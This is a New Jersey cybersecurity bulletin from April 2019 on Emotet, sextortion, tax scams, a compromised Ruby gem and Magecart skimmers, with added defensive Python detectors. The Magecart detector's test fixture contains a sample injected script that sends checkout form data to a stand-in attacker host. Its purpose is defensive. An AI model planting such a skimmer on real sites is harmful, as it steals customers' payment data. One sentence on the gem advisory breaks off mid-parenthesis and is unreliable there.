NJCCIC Weekly Bulletin | April 11, 2019


Garden State Cyber Threat Highlights

Providing our members with weekly insight into the threats and malicious activity directly targeting New Jersey networks.

Emotet Activity Continues

The NJCCIC has received reports of spam emails containing malicious links or attachments associated with the Emotet campaign. Trend Micro also recently observed emails delivering the trojan in password-protected attachments, with the password included in the body of the email so that the recipient can open the file but automated scanners and sandboxes cannot. Threat actors continue to change tactics and techniques to bypass security solutions and avoid detection in sandbox environments. The NJCCIC recommends users refrain from clicking embedded links or attachments or downloading files from unsolicited or unexpected emails, and verify emails from known senders via a separate means of communication. If an Emotet infection is strongly suspected but anti-virus/anti-malware solutions cannot detect or remove it, we advise reimaging the affected system. We also encourage users to proactively monitor and change passwords for any accounts accessed from infected systems and to enable multi-factor authentication where available. If a user believes their account has been compromised, we encourage them to send a copy of the suspicious email to spamreport@cyber.nj.gov and notify their agency ISO, Email Admin, and Helpdesk.

Threat Alerts 

Sextortion Scams Are Continuing to Evolve

Image Source: Bleeping Computer
Last month, a CIA extortion scam was reported to be widely distributed. The threat actor posed as a CIA technical collection officer, claimed to have webcam video of the target visiting adult content sites, and threatened to share the video with the target’s contacts unless an extortion fee was paid. A few weeks later, the threat actor changed tactics, informing the target that they were the subject of an underage pornography investigation but that the incriminating evidence would be destroyed for a fee. An additional variant included in the email a password for an attached PDF containing a bitcoin payment address and instructions. Another variant used password-protected ZIP attachments containing both the PDF payment instructions and a link to the alleged evidence. As of April 7, 2019, Bleeping Computer reported yet another variant, which included a link to purchase the password for an attached password-protected ZIP file that allegedly contains video recordings of the target. Extortion scams constantly evolve to use different scare tactics and generate as much money as possible. The NJCCIC recommends users educate themselves and others on this and similar scams to prevent future victimization. There is no indication that any of these threats are credible; anyone who receives one of these extortion emails should ignore and delete it. We encourage users to report cyber incidents via the NJCCIC Cyber Incident Report Form and the FBI’s Internet Crime Complaint Center (IC3) website.

Ten Malware Families Spread in Rare Use of US Web Servers

Image Source: ZDNet
Bromium researchers have uncovered over a dozen servers hosting ten different malware families spread via phishing campaigns and possibly linked to the Necurs botnet. The servers are registered within the US, which is uncommon given US law enforcement’s record of seizing and removing malicious infrastructure. The main attack route appears to be phishing emails carrying Microsoft Word documents with malicious Visual Basic for Applications (VBA) macros. Campaigns tend to be US-centric: the emails are written in English and appear to come from US organizations such as the Centers for Disease Control and Prevention (CDC). According to Bromium, “Five families of banking Trojans -- Dridex, Gootkit, IcedID, Nymaim, and Trickbot -- two ransomware variants, Gandcrab and Hermes, as well as three information stealers, Fareit, Neutrino, and Azorult, were all found on the servers.” Threat actors were also observed hosting multiple malware families designed to work in tandem. The most widespread lures were fake job applications and unpaid-invoice demands. For more information, please read ZDNet’s article. The NJCCIC recommends users refrain from clicking on links contained in suspicious emails. If the user is uncertain of the email’s legitimacy, we advise them to contact the sender via an alternate method. The NJCCIC encourages users who believe they may have been compromised to send a copy of the suspicious email to spamreport@cyber.nj.gov and to notify their agency ISO, Email Admin, or Helpdesk.
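Two of the lures described in this bulletin, password-protected archives whose password is disclosed in the message body (the Emotet and sextortion campaigns above) and Word documents carrying VBA macros (the Necurs-linked servers), can be triaged at the mail gateway with a small script. The following Python example is added here for illustration and is not code from the NJCCIC, Trend Micro, Bromium or Bleeping Computer. The e-mail, the archive and the document it inspects are constructed inside the script, and the password-disclosure pattern it looks for is this example's own assumption about how such lures are worded.

```python
"""Mail-gateway triage for two lures described in this bulletin:
  (1) a password-protected ZIP attachment whose password is disclosed in the
      message body, so a human can open it but an automated sandbox cannot; and
  (2) an Office Open XML attachment (.docm/.docx/.xlsm) carrying a VBA project.
Everything this script inspects is constructed below for the example."""
import email
import io
import re
import zipfile
from email.message import EmailMessage
from email.policy import default

# Assumption for this example: a disclosed password follows one of these words,
# optionally "is" or ":", e.g. "Archive password: Inv0ice2019".
PASSWORD_RE = re.compile(
    r"\b(?:password|passcode|passphrase|pwd)\b\s*(?:is|:)?\s*[\"']?([^\s\"'<>]{4,})", re.I
)


def zip_is_encrypted(data: bytes) -> bool:
    """True if any ZIP member has the encryption flag (general purpose bit 0) set."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(info.flag_bits & 0x1 for info in zf.infolist())
    except zipfile.BadZipFile:
        return False


def ooxml_has_vba(data: bytes) -> bool:
    """True if the Office Open XML package (itself a ZIP) contains a VBA project part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage(raw: bytes) -> list:
    """Return (attachment name, reason) pairs for attachments matching either lure."""
    msg = email.message_from_bytes(raw, policy=default)
    body = msg.get_body(preferencelist=("plain", "html"))
    disclosed = PASSWORD_RE.findall(body.get_content()) if body else []
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "<unnamed>"
        data = part.get_payload(decode=True) or b""
        if zip_is_encrypted(data):
            reason = "encrypted ZIP"
            if disclosed:
                reason += f", body discloses password {disclosed[0]!r}"
            findings.append((name, reason))
        if ooxml_has_vba(data):
            findings.append((name, "Office document with VBA project"))
    return findings


# ---- constructed sample data -------------------------------------------------

def make_fake_encrypted_zip() -> bytes:
    """Build a ZIP whose headers claim encryption. zipfile cannot write encrypted
    archives, so the encryption bit is patched into the local file header (flags
    at offset 6) and the central directory entry (flags at offset 8); the member
    data stays in the clear, which is enough to exercise the detector."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.doc", b"not really a document")
    data = bytearray(buf.getvalue())
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = data.find(sig)
        while pos != -1:
            data[pos + off] |= 0x1
            pos = data.find(sig, pos + 4)
    return bytes(data)


def make_fake_macro_doc() -> bytes:
    """Minimal OOXML-shaped ZIP with a vbaProject.bin part (contents are dummy)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 dummy OLE container")
    return buf.getvalue()


def sample_message() -> bytes:
    """A constructed lure e-mail carrying both attachment types."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Unpaid invoice 4471"
    msg.set_content("Please see the attached invoice.\nArchive password: Inv0ice2019\n")
    msg.add_attachment(make_fake_encrypted_zip(), maintype="application",
                       subtype="zip", filename="invoice.zip")
    msg.add_attachment(make_fake_macro_doc(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12",
                       filename="application.docm")
    return bytes(msg)


if __name__ == "__main__":
    for name, reason in triage(sample_message()):
        print(f"{name}: {reason}")
```

Run as a script, it prints the two findings for the constructed message. A real deployment would feed every inbound message to triage() and would also need to recognise password-protected Office documents (encrypted OOXML packages and legacy OLE files), which this example does not cover.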

North Korean Malicious Cyber Activity

The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have identified variants of the HOPLIGHT Trojan as part of the North Korean government’s malicious cyber activity tracked as HIDDEN COBRA. DHS and the FBI have published technical details of the tools and infrastructure used by these threat actors. The NJCCIC recommends users review the Malware Analysis Report to enable network defense and reduce exposure to North Korean government malicious cyber activity.

Tax Season Scams Still Prevalent

Image Source: Proofpoint
The annual tax filing deadline is rapidly approaching, and with it comes an increase in phishing and malware campaigns. 2019 has brought NetWire RAT campaigns affecting multiple countries, including the US. Threat actors use social engineering tactics that create a sense of urgency and appear legitimate by using stolen IRS branding. Malware payloads have included, but are not limited to, Remote Access Tools (RATs), downloaders, and banking Trojans, while conventional phishing emails remain persistent. Targets have also expanded to tax preparation offices and the IRS itself, with threat actors posing as individuals in need of assistance. Proofpoint researchers note that, regardless of the payload, actors continue to successfully use social engineering techniques. The NJCCIC recommends users avoid clicking on links contained in suspicious emails. If the user is uncertain of the email’s legitimacy, we encourage them to contact the sender via an alternate method. We also advise users who believe their information may have been compromised to notify the IRS, their banking institution, and a credit reporting bureau.

Vulnerability Advisories 

Xiaomi’s Pre-installed Security App Contains a Severe Vulnerability

A severe vulnerability has been found in Guard Provider, a security app pre-installed on Xiaomi smartphones and intended to protect the user from malware. Xiaomi is widely described as China’s Apple and is the world’s third-largest smartphone maker; its devices are available to US customers via third-party vendors and have steadily grown in popularity since 2017. Guard Provider bundles several third-party Software Development Kits (SDKs) in a single app, so a flaw in one SDK can be exploited to reach the others. The vulnerability could allow a threat actor to carry out a Man-in-the-Middle (MiTM) attack and inject malicious code onto the device, such as ransomware or malware with password-stealing or tracking capabilities. The vulnerability was discovered by Check Point Research and reported to Xiaomi, which released a patch shortly thereafter. There have been no reports of exploitation at the time of this writing. Because apps of this type are pre-installed out-of-the-box, they cannot be removed by the user. The NJCCIC recommends Xiaomi users ensure that mobile device software is up-to-date and all security patches have been applied.

Vulnerability Found in Open-Source Website Development Tool

Image Source: Site24x7

Open-source security firm Snyk recently alerted developers that a compromised version of the open-source website development tool bootstrap-sass was published to RubyGems, the repository where Ruby programmers share packaged code. Threat actors most likely built the malicious copy after compromising a developer’s system or phishing a developer’s credentials. Enterprise and startup businesses use this popular tool, and applications that pulled the compromised release are potentially vulnerable to remote code execution. Snyk further advised its users to update their systems away from the infected framework (version The NJCCIC recommends patching systems as soon as updates become available. For more information, please review CyberScoop’s article.
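The practical follow-up to an advisory like Snyk’s is to check whether your own lockfile resolved the compromised release. The Python example below is added here for illustration and is not code from Snyk, the NJCCIC or the bootstrap-sass project. It parses a Bundler Gemfile.lock and matches the resolved gems against a deny-list; both the lockfile and the deny-list entry (gem `example-ui-kit`, version `1.2.3.1`) are constructed for the example, since the bulletin does not reproduce the affected version.

```python
"""Match the gems resolved in a Bundler Gemfile.lock against known-compromised
(name, version) pairs. The deny-list entry and the lockfile are constructed for
this example and are not the release named in the Snyk advisory."""
import re

# Constructed for this example: (gem name, affected version).
KNOWN_BAD = {("example-ui-kit", "1.2.3.1")}

# Resolved gems sit at exactly four spaces of indent under a "specs:" line;
# their own dependencies are indented six spaces and must not be confused with them.
SPEC_RE = re.compile(r"^ {4}(\S+) \((\S+)\)$")


def parse_lockfile(text: str) -> dict:
    """Return {gem: version} for every resolved gem in the GEM/PATH/GIT specs blocks."""
    resolved, in_specs = {}, False
    for line in text.splitlines():
        if line.strip() == "specs:":
            in_specs = True
            continue
        if in_specs and (not line.startswith("  ") or not line.strip()):
            in_specs = False  # a blank line or a new top-level section ends the block
        if in_specs:
            m = SPEC_RE.match(line)
            if m:
                resolved[m.group(1)] = m.group(2)
    return resolved


def find_compromised(lock_text: str, deny=KNOWN_BAD) -> list:
    """Sorted (gem, version) pairs from the lockfile that appear in the deny-list."""
    return sorted((g, v) for g, v in parse_lockfile(lock_text).items() if (g, v) in deny)


# Constructed sample lockfile in Bundler's format.
SAMPLE_LOCK = """\
GEM
  remote: https://rubygems.org/
  specs:
    example-ui-kit (1.2.3.1)
      sassc (>= 2.0.0)
    ffi (1.10.0)
    rack (2.0.6)
    sassc (2.0.1)
      ffi (~> 1.9)

PLATFORMS
  ruby

DEPENDENCIES
  example-ui-kit (~> 1.2)
  rack

BUNDLED WITH
   1.17.3
"""

if __name__ == "__main__":
    for gem, version in find_compromised(SAMPLE_LOCK):
        print(f"{gem} {version} is a known-compromised release; pin a clean version and rebuild")
```

The check only sees what Bundler actually resolved, so run it against the Gemfile.lock that was deployed, not the one in a developer checkout, and treat a hit as a reason to rotate any secrets the application could reach while the compromised release was installed.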

Samsung Galaxy S10 Fingerprint Scanner Tricked with 3D Print

Image Source: phonearena.com

The new Samsung Galaxy S10 fingerprint sensor can be deceived in as little as 15 minutes. A video uploaded to Imgur shows how the FIDO Alliance-certified ultrasonic fingerprint scanner can be bypassed using a $450 3D printer. The user, Darkshark9, demonstrated this by photographing his fingerprint on a wine glass and printing the image in resin. Prints can also be lifted from a phone’s screen and transferred onto a glass object, producing similar results. Other biometric controls have recently been shown to be defeatable as well: one demonstration bypassed face recognition with a good photo of the owner, and another used a voicemail recording to bypass voice recognition. Once a threat actor has bypassed these controls, they could potentially gain access to personally identifiable information (PII) and to bank accounts that also rely on biometric authentication. The Galaxy S10 also has a built-in crypto wallet, which could likewise be compromised through biometric deception. The concern is the ease with which physical identifiers can be spoofed. “The hope is now that Samsung is made aware of this flaw and adds additional security measures such as two-factor authentication,” stated Darkshark9. At the time of this writing, Samsung continues to release updates with further improvements. The NJCCIC recommends users enable or continue using multi-factor authentication (MFA) and install updates as they become available. For more information, please see Coin Rivet’s article.

Threat Profiles
Android: No new or updated variants were added.
Botnet: No new or updated botnets were added.
Cryptocurrency-Mining: No new or updated variants were added.
Exploit Kit: No new or updated exploit kits were added. 
Industrial Control Systems: One updated variant: Trisis/Triton.
iOS: No new or updated variants were added.
macOS: No new or updated variants were added.
Point-of-Sale: No new or updated variants were added.
Ransomware: Two updated variants: LockerGoga, WannaCry.
Trojan: Two updated variants: Emotet, TrickBot.

ICS-CERT Advisories
Adobe | Apache | Intel (1, 2, 3, 4) | Juniper | Microsoft | Nvidia | Samba (1, 2)

Social Engineering Awareness
Hackers Broke Into University Networks in Just Two Hours
Comment: Spear-phishing attacks can carry threat actors well beyond harvesting staff directories and spoofing emails. They can gain domain-level administrator access to personal information about students and staff, financial information, databases, and networks containing research data. It is important to know where data is stored, restrict access to it, and ensure systems and software are patched and up-to-date. In addition to performing regular vulnerability scans and implementing incident response plans, security awareness training for end users is key to helping them identify phishing emails and report suspicious incidents or suspected attacks.

Cyber at a Glance
Magecart is the Most Infamous Payment Skimmer. But It’s Hardly the Only One
Comment: JavaScript sniffers such as Magecart are the e-commerce equivalent of a physical credit card skimmer or Point-of-Sale (PoS) malware: they skim customer payment information during online checkout. Threat actors inject code into targeted websites and capture account details as they are entered. They also plant additional backdoors so they can regain access and restore the JavaScript sniffers if they are removed. Consumers should check credit card statements frequently for suspicious transactions and report any to their financial institution immediately.
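Because a skimmer works by adding or altering script on the checkout page, the merchant-side control is an inventory of the scripts the page actually loads compared against an approved baseline. The Python example below is added here for illustration and is not code from the cited article or from the NJCCIC; the two page snapshots, the merchant host names and the injected sniffer are all constructed for the example.

```python
"""Inventory the scripts on a checkout page and diff them against an approved
baseline: unknown external script hosts and unapproved inline script bodies are
exactly what an injected JavaScript sniffer looks like. Both HTML snapshots and
the baseline are constructed for this example."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and SHA-256 digests of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = set(), set()
        self._in_inline, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.add(hashlib.sha256(body.encode()).hexdigest())


def inventory(html: str, page_url: str):
    """Return (set of script hosts, set of inline-script digests) for one page snapshot."""
    c = ScriptCollector()
    c.feed(html)
    c.close()
    # Relative src values are resolved against the page URL so first-party scripts
    # count as the merchant's own host.
    hosts = {urlparse(urljoin(page_url, src)).hostname for src in c.external}
    return hosts, c.inline


def audit(html: str, page_url: str, allowed_hosts: set, approved_inline: set) -> dict:
    """Report script hosts and inline scripts not present in the approved baseline."""
    hosts, inline = inventory(html, page_url)
    return {
        "unknown_hosts": sorted(h for h in hosts if h not in allowed_hosts),
        "unknown_inline": sorted(inline - approved_inline),
    }


PAGE_URL = "https://shop.example/checkout"

# Constructed: the checkout page as approved by the merchant.
BASELINE_HTML = """<html><body>
<script src="/js/checkout.js"></script>
<script src="https://js.payment-provider.example/v1/sdk.js"></script>
<script>window.__cfg = {"currency": "USD"};</script>
</body></html>"""

# Constructed: the same page after a skimmer was injected. The inline hook posts
# form data to an attacker host and a second script is loaded from that host.
SKIMMED_HTML = BASELINE_HTML.replace("</body>", """\
<script>document.addEventListener('submit', function (e) {
  var d = JSON.stringify(Object.fromEntries(new FormData(e.target)));
  new Image().src = 'https://cdn-statics.example/g.php?d=' + btoa(d);
});</script>
<script src="https://cdn-statics.example/jquery.min.js"></script>
</body>""")


if __name__ == "__main__":
    allowed, approved = inventory(BASELINE_HTML, PAGE_URL)
    print(audit(SKIMMED_HTML, PAGE_URL, allowed, approved))
```

In practice the baseline comes from a known-good build, and first-party script files should be hashed by content as well, since a skimmer can also be appended to an existing file rather than added as a new tag. A Content-Security-Policy with a script-src allow-list gives the browser-side equivalent of this check.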
Students Hack High School WiFi to Get Out of Tests
Comment: As the demand for technology at academic institutions increases, so must its security. Two students at a New Jersey high school presumably used a program or app to perform a denial-of-service attack against school WiFi equipment, causing it to crash or become too congested to use. The attack resulted in connection failures, disrupted classes, and inaccessible classwork.


Email a Cyber Liaison Officer at njccic@cyber.nj.gov.
The Weekly Bulletin aggregates information about cyber threats, vulnerabilities, and other resources to promote shared awareness and the adoption of best practices. Designed for a general audience, the Bulletin aims to bridge the information sharing gaps between all levels of government, the private sector, and our citizens.


